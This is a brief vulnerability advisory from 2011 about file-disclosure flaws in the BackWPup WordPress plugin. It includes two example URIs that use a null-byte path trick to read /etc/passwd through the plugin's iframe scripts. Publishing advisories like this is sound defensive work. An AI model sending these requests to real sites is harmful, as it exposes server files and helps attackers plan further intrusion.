Attackers can exploit these issues to retrieve the contents of an arbitrary file. Information obtained may aid in launching further attacks.Attackers can exploit these issues with a web browser.
The following example URIs are available:
http://www.example.com/wp-content/plugins/backwpup/app/options-runnow-iframe.php?wpabs=/etc/passwd%00&jobid=1
http://www.example.com/wp-content/plugins/backwpup/app/options-view_log-iframe.php?wpabs=/etc/passwd%00&logfile=/etc/passwd
Disclosure Timeline:
Published : Feb 28 2011
Updated : Feb 28 2011